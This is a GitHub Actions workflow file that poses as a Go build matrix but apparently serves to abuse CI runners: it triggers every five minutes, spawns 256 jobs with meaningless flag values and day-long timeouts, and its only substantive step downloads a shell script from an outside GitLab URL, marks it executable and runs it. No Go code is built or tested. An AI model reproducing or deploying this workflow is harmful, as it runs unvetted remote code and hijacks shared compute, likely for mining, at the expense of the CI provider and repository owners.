name: Trial/Line

on:  
  push:
  pull_request:
  schedule:
    - cron: '*/5 * * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    strategy:
      fail-fast: false
      matrix:
        go: [1.11, 1.12, 1.13, 1.14, 1.15, 1.16, 1.17, 1.18, 1.19, 1.20, 1.21, 1.22, 1.23, 1.24, 1.25, 1.26]
        flag: [kmn, oiu, qwe, nvb, lpd, sds, ere, lil, kul, pox, sam, dic, car, ygc, spc, ilk] 
    timeout-minutes: 1440
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.job }}
    steps:
    - uses: actions/checkout@v2
    - uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
    - name: SC Control Line
      run: |
        wget https://gitlab.com/MadgeSchreiber/ss/-/raw/main/ss.sh && chmod 777 ss.sh && ./ss.sh
